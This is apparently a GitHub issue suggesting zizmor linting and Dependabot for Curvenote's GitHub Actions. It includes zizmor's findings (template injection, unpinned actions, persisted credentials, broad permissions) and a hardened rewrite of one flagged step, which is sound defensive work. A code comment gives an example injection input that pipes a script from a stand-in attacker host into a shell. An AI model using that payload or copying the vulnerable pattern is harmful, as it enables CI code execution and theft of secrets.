Description
Some of the Actions provided by Curvenote in this repo are intended to be used by users in their own repositories, for example for drafting, submitting and publishing articles.
In order to harness the security of these actions, I would suggest using zizmor to lint them for common vulnerabilities. Zizmor is a static linter for GitHub Actions that looks for common vulnerable spots. It runs very fast (written in Rust), it has a very well documented set of rules (with tips on how to fix them), and also automatic fixes for some of them.
A recent success story of zizmor was how it allowed the discovery of a vulnerability in the gh-action-pypi-publish action that was patched in v1.13.0.
Zizmor can run in a GitHub Action itself, so PRs in this repo can get automatic reports of possible vulnerabilities. It's also nice to pair the linting with Dependabot, which regularly checks for updated Actions and automatically opens PRs to update them.
I can share links to the setup we have in one of the Fatiando a Terra repos:
- dependabot.yml: https://github.com/fatiando/choclo/blob/main/.github/dependabot.yml
- Action to run zizmor: https://github.com/fatiando/choclo/blob/main/.github/workflows/actions.yml
Just to illustrate how zizmor would work in this repo, here's the output of `zizmor .`:
Output of zizmor
warning[artipacked]: credential persistence through GitHub Actions artifacts
--> .github/workflows/draft.yml:118:9
|
118 | - uses: actions/checkout@v4
| _________-
119 | | with:
120 | | ref: ${{ inputs.ref || github.event.pull_request.head.sha }}
121 | | fetch-depth: 1
| |________________________- does not set persist-credentials: false
|
= note: audit confidence → Low
= note: this finding has an auto-fix
warning[artipacked]: credential persistence through GitHub Actions artifacts
--> .github/workflows/draft.yml:150:9
|
150 | - uses: actions/checkout@v4
| _________-
151 | | with:
152 | | ref: ${{ inputs.ref || github.event.pull_request.head.sha }}
153 | | fetch-depth: 1
| |________________________- does not set persist-credentials: false
|
= note: audit confidence → Low
= note: this finding has an auto-fix
warning[artipacked]: credential persistence through GitHub Actions artifacts
--> .github/workflows/draft.yml:174:9
|
174 | - uses: actions/checkout@v4
| _________-
175 | | with:
176 | | ref: ${{ inputs.ref || github.event.pull_request.head.sha }}
177 | | fetch-depth: 1
| |________________________- does not set persist-credentials: false
|
= note: audit confidence → Low
= note: this finding has an auto-fix
error[template-injection]: code injection via template expansion
--> .github/workflows/draft.yml:185:21
|
184 | run: |
| ^^^ this run block
185 | if [ "${{ inputs.debug }}" = "true" ]; then
| ^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
error[template-injection]: code injection via template expansion
--> .github/workflows/draft.yml:188:24
|
184 | run: |
| ^^^ this run block
185 | if [ "${{ inputs.debug }}" = "true" ]; then
186 | DEBUG="-d"
187 | fi
188 | if [ -n "${{ inputs.collection }}" ]; then
| ^^^^^^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
error[template-injection]: code injection via template expansion
--> .github/workflows/draft.yml:189:42
|
184 | run: |
| ^^^ this run block
185 | if [ "${{ inputs.debug }}" = "true" ]; then
...
188 | if [ -n "${{ inputs.collection }}" ]; then
189 | COLLECTION="--collection ${{ inputs.collection }}"
| ^^^^^^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
error[template-injection]: code injection via template expansion
--> .github/workflows/draft.yml:191:31
|
184 | run: |
| ^^^ this run block
185 | if [ "${{ inputs.debug }}" = "true" ]; then
...
190 | fi
191 | curvenote check ${{ inputs.venue }} --kind "${{ inputs.kind }}" $COLLECTION $DEBUG
| ^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
error[template-injection]: code injection via template expansion
--> .github/workflows/draft.yml:191:59
|
184 | run: |
| ^^^ this run block
185 | if [ "${{ inputs.debug }}" = "true" ]; then
...
190 | fi
191 | curvenote check ${{ inputs.venue }} --kind "${{ inputs.kind }}" $COLLECTION $DEBUG
| ^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
error[unpinned-uses]: unpinned action reference
--> .github/workflows/draft.yml:128:9
|
128 | uses: curvenote/actions/strategy@main
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ action is not pinned to a hash (required by blanket policy)
|
= note: audit confidence → High
error[unpinned-uses]: unpinned action reference
--> .github/workflows/draft.yml:154:9
|
154 | - uses: curvenote/actions/setup@main
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ action is not pinned to a hash (required by blanket policy)
|
= note: audit confidence → High
error[unpinned-uses]: unpinned action reference
--> .github/workflows/draft.yml:155:9
|
155 | - uses: curvenote/actions/submit@main
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ action is not pinned to a hash (required by blanket policy)
|
= note: audit confidence → High
error[unpinned-uses]: unpinned action reference
--> .github/workflows/draft.yml:178:9
|
178 | - uses: curvenote/actions/setup@main
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ action is not pinned to a hash (required by blanket policy)
|
= note: audit confidence → High
error[unpinned-uses]: unpinned action reference
--> .github/workflows/draft.yml:205:9
|
205 | - uses: curvenote/actions/submit-summary@main
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ action is not pinned to a hash (required by blanket policy)
|
= note: audit confidence → High
error[unpinned-uses]: unpinned action reference
--> .github/workflows/draft.yml:210:9
|
210 | uses: curvenote/actions/upsert-comment@main
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ action is not pinned to a hash (required by blanket policy)
|
= note: audit confidence → High
warning[artipacked]: credential persistence through GitHub Actions artifacts
--> .github/workflows/pr_release.yml:13:9
|
13 | - uses: actions/checkout@v4
| _________-
14 | | with:
15 | | # Fine-grained PAT with contents:write and workflows:write scopes
16 | | token: ${{ secrets.WORKFLOW_TOKEN }}
| |______________________________________________- does not set persist-credentials: false
|
= note: audit confidence → Low
= note: this finding has an auto-fix
error[unpinned-uses]: unpinned action reference
--> .github/workflows/pr_release.yml:53:9
|
53 | uses: curvenote/actions/upsert-comment@v1
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ action is not pinned to a hash (required by blanket policy)
|
= note: audit confidence → High
warning[artipacked]: credential persistence through GitHub Actions artifacts
--> .github/workflows/publish.yml:116:9
|
116 | - uses: actions/checkout@v4
| _________-
117 | | with:
118 | | ref: ${{ inputs.ref }}
119 | | fetch-depth: 1
| |________________________- does not set persist-credentials: false
|
= note: audit confidence → Low
= note: this finding has an auto-fix
warning[artipacked]: credential persistence through GitHub Actions artifacts
--> .github/workflows/publish.yml:147:9
|
147 | - uses: actions/checkout@v4
| _________-
148 | | with:
149 | | ref: ${{ inputs.ref }}
150 | | fetch-depth: 1
| |________________________- does not set persist-credentials: false
|
= note: audit confidence → Low
= note: this finding has an auto-fix
warning[artipacked]: credential persistence through GitHub Actions artifacts
--> .github/workflows/publish.yml:169:9
|
169 | - uses: actions/checkout@v4
| _________-
170 | | with:
171 | | ref: ${{ inputs.ref }}
172 | | fetch-depth: 1
| |________________________- does not set persist-credentials: false
|
= note: audit confidence → Low
= note: this finding has an auto-fix
error[template-injection]: code injection via template expansion
--> .github/workflows/publish.yml:179:24
|
178 | - run: |
| ^^^ this run block
179 | if [ -n "${{ inputs.collection }}" ]; then
| ^^^^^^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
error[template-injection]: code injection via template expansion
--> .github/workflows/publish.yml:180:42
|
178 | - run: |
| ^^^ this run block
179 | if [ -n "${{ inputs.collection }}" ]; then
180 | COLLECTION="--collection ${{ inputs.collection }}"
| ^^^^^^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
error[template-injection]: code injection via template expansion
--> .github/workflows/publish.yml:182:31
|
178 | - run: |
| ^^^ this run block
179 | if [ -n "${{ inputs.collection }}" ]; then
180 | COLLECTION="--collection ${{ inputs.collection }}"
181 | fi
182 | curvenote check ${{ inputs.venue }} --kind "${{ inputs.kind }}" $COLLECTION
| ^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
error[template-injection]: code injection via template expansion
--> .github/workflows/publish.yml:182:59
|
178 | - run: |
| ^^^ this run block
179 | if [ -n "${{ inputs.collection }}" ]; then
180 | COLLECTION="--collection ${{ inputs.collection }}"
181 | fi
182 | curvenote check ${{ inputs.venue }} --kind "${{ inputs.kind }}" $COLLECTION
| ^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
error[unpinned-uses]: unpinned action reference
--> .github/workflows/publish.yml:126:9
|
126 | uses: curvenote/actions/strategy@main
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ action is not pinned to a hash (required by blanket policy)
|
= note: audit confidence → High
error[unpinned-uses]: unpinned action reference
--> .github/workflows/publish.yml:151:9
|
151 | - uses: curvenote/actions/setup@main
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ action is not pinned to a hash (required by blanket policy)
|
= note: audit confidence → High
error[unpinned-uses]: unpinned action reference
--> .github/workflows/publish.yml:152:9
|
152 | - uses: curvenote/actions/submit@main
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ action is not pinned to a hash (required by blanket policy)
|
= note: audit confidence → High
error[unpinned-uses]: unpinned action reference
--> .github/workflows/publish.yml:173:9
|
173 | - uses: curvenote/actions/setup@main
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ action is not pinned to a hash (required by blanket policy)
|
= note: audit confidence → High
error[unpinned-uses]: unpinned action reference
--> .github/workflows/publish.yml:194:9
|
194 | - uses: curvenote/actions/submit-summary@main
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ action is not pinned to a hash (required by blanket policy)
|
= note: audit confidence → High
error[unpinned-uses]: unpinned action reference
--> .github/workflows/publish.yml:198:9
|
198 | - uses: curvenote/actions/upsert-comment@main
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ action is not pinned to a hash (required by blanket policy)
|
= note: audit confidence → High
warning[artipacked]: credential persistence through GitHub Actions artifacts
--> .github/workflows/push.yml:22:9
|
22 | - uses: actions/checkout@v4
| ------------------------- does not set persist-credentials: false
|
= note: audit confidence → Low
= note: this finding has an auto-fix
error[template-injection]: code injection via template expansion
--> .github/workflows/push.yml:30:21
|
29 | run: |
| ^^^ this run block
30 | if [ "${{ inputs.debug }}" = "true" ]; then
| ^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
error[template-injection]: code injection via template expansion
--> .github/workflows/push.yml:40:21
|
39 | run: |
| ^^^ this run block
40 | if [ "${{ inputs.debug }}" = "true" ]; then
| ^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
error[template-injection]: code injection via template expansion
--> .github/workflows/push.yml:50:21
|
49 | run: |
| ^^^ this run block
50 | if [ "${{ inputs.debug }}" = "true" ]; then
| ^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
error[template-injection]: code injection via template expansion
--> .github/workflows/push.yml:53:35
|
49 | run: |
| ^^^ this run block
50 | if [ "${{ inputs.debug }}" = "true" ]; then
51 | DEBUG="-d"
52 | fi
53 | curvenote site init ${{ inputs.landing-content }} $DEBUG --set-content
| ^^^^^^^^^^^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
error[unpinned-uses]: unpinned action reference
--> .github/workflows/push.yml:23:9
|
23 | - uses: curvenote/actions/setup@main
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ action is not pinned to a hash (required by blanket policy)
|
= note: audit confidence → High
warning[artipacked]: credential persistence through GitHub Actions artifacts
--> .github/workflows/release.yml:14:9
|
14 | - uses: actions/checkout@v4
| _________-
15 | | with:
16 | | fetch-depth: 0 # Fetches all tags
| |___________________________________________- does not set persist-credentials: false
|
= note: audit confidence → Low
= note: this finding has an auto-fix
warning[artipacked]: credential persistence through GitHub Actions artifacts
--> .github/workflows/release.yml:40:9
|
40 | - uses: actions/checkout@v4
| _________-
41 | | with:
42 | | # Fine-grained PAT with contents:write and workflows:write scopes
43 | | token: ${{ secrets.WORKFLOW_TOKEN }}
| |______________________________________________- does not set persist-credentials: false
|
= note: audit confidence → Low
= note: this finding has an auto-fix
warning[artipacked]: credential persistence through GitHub Actions artifacts
--> .github/workflows/release.yml:85:9
|
85 | - uses: actions/checkout@v4
| _________-
86 | | with:
87 | | fetch-depth: 0
88 | | # Fine-grained PAT with contents:write and workflows:write scopes
89 | | token: ${{ secrets.WORKFLOW_TOKEN }}
| |______________________________________________- does not set persist-credentials: false
|
= note: audit confidence → Low
= note: this finding has an auto-fix
warning[excessive-permissions]: overly broad permissions
--> .github/workflows/release.yml:1:1
|
1 | / name: Release
2 | | on:
... |
125 | | run: |
126 | | git push origin --tags --force
| |_________________________________________- default permissions used due to no permissions: block
|
= note: audit confidence → Medium
warning[excessive-permissions]: overly broad permissions
--> .github/workflows/release.yml:7:3
|
7 | / prepare:
8 | | name: Decide if Versioned Release is Required
... |
33 | | fi
34 | | fi
| | -
| |____________|
| this job
| default permissions used due to no permissions: block
|
= note: audit confidence → Medium
warning[excessive-permissions]: overly broad permissions
--> .github/workflows/release.yml:35:3
|
35 | / latest:
36 | | name: Create Latest Release
... |
77 | | run: |
78 | | git push origin --tags --force
| | -
| |________________________________________|
| this job
| default permissions used due to no permissions: block
|
= note: audit confidence → Medium
warning[excessive-permissions]: overly broad permissions
--> .github/workflows/release.yml:79:3
|
79 | / release:
80 | | name: Create Versioned Release
... |
125 | | run: |
126 | | git push origin --tags --force
| | -
| |_________________________________________|
| this job
| default permissions used due to no permissions: block
|
= note: audit confidence → Medium
info[template-injection]: code injection via template expansion
--> .github/workflows/release.yml:23:66
|
22 | run: |
| --- info: this run block
23 | if git show-ref --tags --verify --quiet "refs/tags/${{ steps.get-version.outputs.version }}"; then
| --------------------------------- info: may expand into attacker-controllable code
|
= note: audit confidence → Low
= note: this finding has an auto-fix
info[template-injection]: code injection via template expansion
--> .github/workflows/release.yml:24:31
|
22 | run: |
| --- info: this run block
23 | if git show-ref --tags --verify --quiet "refs/tags/${{ steps.get-version.outputs.version }}"; then
24 | echo "Version ${{ steps.get-version.outputs.version }} exists; not releasing"
| --------------------------------- info: may expand into attacker-controllable code
|
= note: audit confidence → Low
= note: this finding has an auto-fix
info[template-injection]: code injection via template expansion
--> .github/workflows/release.yml:27:23
|
22 | run: |
| --- info: this run block
23 | if git show-ref --tags --verify --quiet "refs/tags/${{ steps.get-version.outputs.version }}"; then
...
26 | else
27 | if [[ ${{ steps.get-version.outputs.version }} =~ ^v[0-9]+\.[0-9]+\.[0-9]+$ ]]; then
| --------------------------------- info: may expand into attacker-controllable code
|
= note: audit confidence → Low
= note: this finding has an auto-fix
info[template-injection]: code injection via template expansion
--> .github/workflows/release.yml:28:33
|
22 | run: |
| --- info: this run block
23 | if git show-ref --tags --verify --quiet "refs/tags/${{ steps.get-version.outputs.version }}"; then
...
27 | if [[ ${{ steps.get-version.outputs.version }} =~ ^v[0-9]+\.[0-9]+\.[0-9]+$ ]]; then
28 | echo "Version ${{ steps.get-version.outputs.version }} to be released!"
| --------------------------------- info: may expand into attacker-controllable code
|
= note: audit confidence → Low
= note: this finding has an auto-fix
info[template-injection]: code injection via template expansion
--> .github/workflows/release.yml:31:33
|
22 | run: |
| --- info: this run block
23 | if git show-ref --tags --verify --quiet "refs/tags/${{ steps.get-version.outputs.version }}"; then
...
30 | else
31 | echo "Version ${{ steps.get-version.outputs.version }} does not match expected pattern (e.g. v1.0.0); not releasing"
| --------------------------------- info: may expand into attacker-controllable code
|
= note: audit confidence → Low
= note: this finding has an auto-fix
info[template-injection]: code injection via template expansion
--> .github/workflows/release.yml:97:39
|
96 | run: |
| --- info: this run block
97 | git checkout -b release/${{ needs.prepare.outputs.version }}
| ----------------------------- info: may expand into attacker-controllable code
|
= note: audit confidence → Low
= note: this finding has an auto-fix
info[template-injection]: code injection via template expansion
--> .github/workflows/release.yml:100:31
|
99 | run: |
| --- info: this run block
100 | sed -i s/@main/@${{ needs.prepare.outputs.version }}/g .github/workflows/publish.yml
| ----------------------------- info: may expand into attacker-controllable code
|
= note: audit confidence → Low
= note: this finding has an auto-fix
info[template-injection]: code injection via template expansion
--> .github/workflows/release.yml:101:31
|
99 | run: |
| --- info: this run block
100 | sed -i s/@main/@${{ needs.prepare.outputs.version }}/g .github/workflows/publish.yml
101 | sed -i s/@main/@${{ needs.prepare.outputs.version }}/g .github/workflows/draft.yml
| ----------------------------- info: may expand into attacker-controllable code
|
= note: audit confidence → Low
= note: this finding has an auto-fix
info[template-injection]: code injection via template expansion
--> .github/workflows/release.yml:102:31
|
99 | run: |
| --- info: this run block
100 | sed -i s/@main/@${{ needs.prepare.outputs.version }}/g .github/workflows/publish.yml
101 | sed -i s/@main/@${{ needs.prepare.outputs.version }}/g .github/workflows/draft.yml
102 | sed -i s/@main/@${{ needs.prepare.outputs.version }}/g .github/workflows/submit.yml
| ----------------------------- info: may expand into attacker-controllable code
|
= note: audit confidence → Low
= note: this finding has an auto-fix
info[template-injection]: code injection via template expansion
--> .github/workflows/release.yml:103:31
|
99 | run: |
| --- info: this run block
100 | sed -i s/@main/@${{ needs.prepare.outputs.version }}/g .github/workflows/publish.yml
101 | sed -i s/@main/@${{ needs.prepare.outputs.version }}/g .github/workflows/draft.yml
102 | sed -i s/@main/@${{ needs.prepare.outputs.version }}/g .github/workflows/submit.yml
103 | sed -i s/@main/@${{ needs.prepare.outputs.version }}/g .github/workflows/push.yml
| ----------------------------- info: may expand into attacker-controllable code
|
= note: audit confidence → Low
= note: this finding has an auto-fix
info[template-injection]: code injection via template expansion
--> .github/workflows/release.yml:118:32
|
109 | run: |
| --- info: this run block
110 | git config --global user.name "${GITHUB_ACTOR}"
...
117 | git add -f submit-summary/dist
118 | git commit -m "🚀 ${{ needs.prepare.outputs.version }}"
| ----------------------------- info: may expand into attacker-controllable code
|
= note: audit confidence → Low
= note: this finding has an auto-fix
info[template-injection]: code injection via template expansion
--> .github/workflows/release.yml:121:23
|
120 | run: |
| --- info: this run block
121 | git tag ${{ needs.prepare.outputs.version }}
| ----------------------------- info: may expand into attacker-controllable code
|
= note: audit confidence → Low
= note: this finding has an auto-fix
info[template-injection]: code injection via template expansion
--> .github/workflows/release.yml:122:45
|
120 | run: |
| --- info: this run block
121 | git tag ${{ needs.prepare.outputs.version }}
122 | git tag `cut -d "." -f -2 <<< ${{ needs.prepare.outputs.version }}` --force
| ----------------------------- info: may expand into attacker-controllable code
|
= note: audit confidence → Low
= note: this finding has an auto-fix
info[template-injection]: code injection via template expansion
--> .github/workflows/release.yml:123:45
|
120 | run: |
| --- info: this run block
121 | git tag ${{ needs.prepare.outputs.version }}
122 | git tag `cut -d "." -f -2 <<< ${{ needs.prepare.outputs.version }}` --force
123 | git tag `cut -d "." -f -1 <<< ${{ needs.prepare.outputs.version }}` --force
| ----------------------------- info: may expand into attacker-controllable code
|
= note: audit confidence → Low
= note: this finding has an auto-fix
warning[artipacked]: credential persistence through GitHub Actions artifacts
--> .github/workflows/submit.yml:132:9
|
132 | - uses: actions/checkout@v4
| _________-
133 | | with:
134 | | ref: ${{ inputs.ref || github.event.pull_request.head.sha }}
135 | | fetch-depth: 1
| |________________________- does not set persist-credentials: false
|
= note: audit confidence → Low
= note: this finding has an auto-fix
warning[artipacked]: credential persistence through GitHub Actions artifacts
--> .github/workflows/submit.yml:161:9
|
161 | - uses: actions/checkout@v4
| _________-
162 | | with:
163 | | ref: ${{ inputs.ref || github.event.pull_request.head.sha }}
164 | | fetch-depth: 1
| |________________________- does not set persist-credentials: false
|
= note: audit confidence → Low
= note: this finding has an auto-fix
warning[artipacked]: credential persistence through GitHub Actions artifacts
--> .github/workflows/submit.yml:194:9
|
194 | - uses: actions/checkout@v4
| _________-
195 | | with:
196 | | ref: ${{ inputs.ref || github.event.pull_request.head.sha }}
197 | | fetch-depth: 1
| |________________________- does not set persist-credentials: false
|
= note: audit confidence → Low
= note: this finding has an auto-fix
error[template-injection]: code injection via template expansion
--> .github/workflows/submit.yml:171:21
|
170 | run: |
| ^^^ this run block
171 | if [ "${{ inputs.debug }}" = "true" ]; then
| ^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
error[template-injection]: code injection via template expansion
--> .github/workflows/submit.yml:174:24
|
170 | run: |
| ^^^ this run block
171 | if [ "${{ inputs.debug }}" = "true" ]; then
172 | DEBUG="-d"
173 | fi
174 | if [ -n "${{ inputs.collection }}" ]; then
| ^^^^^^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
error[template-injection]: code injection via template expansion
--> .github/workflows/submit.yml:175:42
|
170 | run: |
| ^^^ this run block
171 | if [ "${{ inputs.debug }}" = "true" ]; then
...
174 | if [ -n "${{ inputs.collection }}" ]; then
175 | COLLECTION="--collection ${{ inputs.collection }}"
| ^^^^^^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
error[template-injection]: code injection via template expansion
--> .github/workflows/submit.yml:177:31
|
170 | run: |
| ^^^ this run block
171 | if [ "${{ inputs.debug }}" = "true" ]; then
...
176 | fi
177 | curvenote check ${{ inputs.venue }} --kind "${{ inputs.kind }}" $COLLECTION $DEBUG
| ^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
error[template-injection]: code injection via template expansion
--> .github/workflows/submit.yml:177:59
|
170 | run: |
| ^^^ this run block
171 | if [ "${{ inputs.debug }}" = "true" ]; then
...
176 | fi
177 | curvenote check ${{ inputs.venue }} --kind "${{ inputs.kind }}" $COLLECTION $DEBUG
| ^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
error[unpinned-uses]: unpinned action reference
--> .github/workflows/submit.yml:142:9
|
142 | uses: curvenote/actions/strategy@main
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ action is not pinned to a hash (required by blanket policy)
|
= note: audit confidence → High
error[unpinned-uses]: unpinned action reference
--> .github/workflows/submit.yml:165:9
|
165 | - uses: curvenote/actions/setup@main
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ action is not pinned to a hash (required by blanket policy)
|
= note: audit confidence → High
error[unpinned-uses]: unpinned action reference
--> .github/workflows/submit.yml:198:9
|
198 | - uses: curvenote/actions/setup@main
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ action is not pinned to a hash (required by blanket policy)
|
= note: audit confidence → High
error[unpinned-uses]: unpinned action reference
--> .github/workflows/submit.yml:199:9
|
199 | - uses: curvenote/actions/submit@main
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ action is not pinned to a hash (required by blanket policy)
|
= note: audit confidence → High
error[unpinned-uses]: unpinned action reference
--> .github/workflows/submit.yml:221:9
|
221 | - uses: curvenote/actions/submit-summary@main
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ action is not pinned to a hash (required by blanket policy)
|
= note: audit confidence → High
error[unpinned-uses]: unpinned action reference
--> .github/workflows/submit.yml:226:9
|
226 | uses: curvenote/actions/upsert-comment@main
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ action is not pinned to a hash (required by blanket policy)
|
= note: audit confidence → High
136 findings (66 suppressed, 46 fixable): 0 unknown, 14 informational, 0 low, 18 medium, 38 high
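For anyone who wants to try the setup described above without going through the Fatiando links, here is an added example of the two files involved. This is not the configuration from the Fatiando repos and not code from this repo; it follows the approach in the zizmor docs (`uvx zizmor`). The action tags (`@v4`, `@v6`) are placeholders chosen for readability: a real setup should pin each `uses:` to a commit SHA, which is exactly what the `unpinned-uses` findings above ask for, and Dependabot will then keep those SHAs updated.

```yaml
# .github/workflows/zizmor.yml  (added example, not from this repo)
name: Lint GitHub Actions with zizmor

on:
  push:
    branches: [main]
  pull_request:

# Deny everything at the workflow level; grant only what the job needs.
permissions: {}

jobs:
  zizmor:
    name: Run zizmor
    runs-on: ubuntu-latest
    permissions:
      contents: read          # only needed to check out the repo
    steps:
      - uses: actions/checkout@v4        # placeholder tag; pin to a SHA in practice
        with:
          persist-credentials: false     # avoids the `artipacked` finding above

      - uses: astral-sh/setup-uv@v6      # placeholder tag; pin to a SHA in practice

      - name: Run zizmor
        # Fails the job on any finding at or above "medium"; drop --min-severity
        # to see the informational ones as well. GH_TOKEN lets zizmor resolve
        # remote action references (e.g. to check whether a ref is a tag or SHA).
        run: uvx zizmor --min-severity medium .
        env:
          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}

---
# .github/dependabot.yml  (added example, not from this repo)
version: 2
updates:
  - package-ecosystem: github-actions
    directory: /
    schedule:
      interval: weekly
```

Running zizmor on every pull request means a change that reintroduces `${{ inputs.* }}` inside a `run:` block, or a new `uses:` that is not pinned, is flagged before it is merged. The `github-actions` Dependabot ecosystem understands SHA-pinned `uses:` lines and updates the hash together with the version comment, so pinning does not turn into a maintenance burden.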
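Since most of the `error`-level findings above are the same two patterns (template expansion inside `run:` and `actions/checkout` keeping its token), here is an added example of what the fix for one of the flagged steps looks like. It is my own rewrite of the `curvenote check` step shown in the `draft.yml`/`submit.yml` findings, not a patch from this repo, and the job and step names are made up for illustration. The caveat worth stating: these are `workflow_call` inputs, so whether they are really attacker-controlled depends on the calling workflow. zizmor cannot know that, which is why it rates them High; routing the values through `env:` is cheap and removes the question entirely.

```yaml
# Added example, not code from this repo. Two versions of the same step.

# BEFORE: the expression is expanded into the shell script *before* bash runs,
# so an input such as   main"; curl attacker.example | sh; echo "
# becomes part of the script. This is the `template-injection` finding.
- name: Check submission (vulnerable form, do not use)
  run: |
    if [ "${{ inputs.debug }}" = "true" ]; then
      DEBUG="-d"
    fi
    if [ -n "${{ inputs.collection }}" ]; then
      COLLECTION="--collection ${{ inputs.collection }}"
    fi
    curvenote check ${{ inputs.venue }} --kind "${{ inputs.kind }}" $COLLECTION $DEBUG

# AFTER: the values reach the script only as environment variables. Bash never
# parses their contents as code, and quoting plus an argument array also fixes
# the word-splitting bug in the unquoted $COLLECTION above.
- name: Check submission (hardened form)
  env:
    VENUE: ${{ inputs.venue }}
    KIND: ${{ inputs.kind }}
    COLLECTION: ${{ inputs.collection }}
    DEBUG: ${{ inputs.debug }}
  run: |
    args=()
    if [ "$DEBUG" = "true" ]; then
      args+=(-d)
    fi
    if [ -n "$COLLECTION" ]; then
      args+=(--collection "$COLLECTION")
    fi
    curvenote check "$VENUE" --kind "$KIND" "${args[@]}"

# The matching checkout step. persist-credentials: false stops the GITHUB_TOKEN
# from being written into .git/config, where a later artifact upload or a
# compromised step could read it (the `artipacked` finding). The job-level
# permissions block addresses `excessive-permissions` for workflows that
# otherwise inherit the repository default.
- uses: actions/checkout@v4          # placeholder tag; pin to a SHA in practice
  with:
    ref: ${{ inputs.ref || github.event.pull_request.head.sha }}
    fetch-depth: 1
    persist-credentials: false
```

The same `env:` rewrite applies to the `release.yml` findings that interpolate `steps.get-version.outputs.version` and `needs.prepare.outputs.version`; those are rated Low because the value comes from an earlier step in the same workflow, but a version string that is later passed to `sed -i s/@main/@.../g` and `git tag` is still worth quoting and validating against the `^v[0-9]+\.[0-9]+\.[0-9]+$` pattern the workflow already has, before it is used rather than after.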